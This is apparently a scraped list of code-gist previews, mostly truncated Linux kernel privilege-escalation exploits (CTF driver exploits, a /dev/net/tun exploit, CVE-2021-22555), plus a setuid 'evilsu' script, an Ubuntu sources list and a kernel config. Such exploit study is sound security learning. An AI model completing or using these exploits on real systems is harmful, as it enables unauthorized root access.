This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <fcntl.h> | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <signal.h> | |
char *VULN_DRV = "/dev/hackme"; | |
void spawn_shell(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
mv /evilsu /tmp/evilsu | |
chmod u+s /tmp/evilsu | |
chmod 777 /evilsu |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <fcntl.h> | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <signal.h> | |
void spawn_shell(); | |
void leak_commit_creds_from_ksymtab(); | |
void leak_prepare_kernel_cred_from_ksymtab(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# deb cdrom:[Ubuntu-Server 9.10 _Karmic Koala_ - Release amd64 (20091027.2)]/ karmic main restricted | |
#deb cdrom:[Ubuntu-Server 9.10 _Karmic Koala_ - Release amd64 (20091027.2)]/ karmic main restricted | |
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to | |
# newer versions of the distribution. | |
deb http://old-releases.ubuntu.com/ubuntu/ karmic main restricted | |
deb-src http://old-releases.ubuntu.com/ubuntu/ karmic main restricted |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun | |
A vulnerability which, when viewed at the source level, is unexploitable! | |
But which, thanks to gcc optimizations, becomes exploitable :) | |
Also, bypass of mmap_min_addr via SELinux vulnerability! | |
(where having SELinux enabled actually increases your risk against a | |
large class of kernel vulnerabilities) | |
for 2.6.30 without SELinux enabled, compile with: | |
cc -fPIC -fno-stack-protector -shared -o exploit.so exploit.c | |
(on a 64bit system -m64 may be necessary to compile a 64bit .so) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// $ gcc -no-pie -static -pthread ./exploit.c -o ./exploit | |
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <limits.h> | |
#include <linux/keyctl.h> | |
#include <sys/wait.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Automatically generated file; DO NOT EDIT. | |
# Linux/x86 5.17.15 Kernel Configuration | |
# | |
CONFIG_CC_VERSION_TEXT="gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0" | |
CONFIG_CC_IS_GCC=y | |
CONFIG_GCC_VERSION=90300 | |
CONFIG_CLANG_VERSION=0 | |
CONFIG_AS_IS_GNU=y | |
CONFIG_AS_VERSION=23400 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* CVE-2021-22555: Turning \x00\x00 into 10000$ | |
* by Andy Nguyen (theflow@) | |
* | |
* theflow@theflow:~$ gcc -m32 -static -o exploit -Wall exploit.c | |
* theflow@theflow:~$ ./exploit | |
* [+] Linux Privilege Escalation by theflow@ - 2021 | |
* | |
* [+] STAGE 0: Initialization | |
* [*] Setting up namespace sandbox... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <fcntl.h> | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> | |
char *VULN_DRV = "/dev/holstein"; | |
void spawn_shell(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <fcntl.h> | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> | |
char *VULN_DRV = "/dev/holstein"; | |
void spawn_shell(); |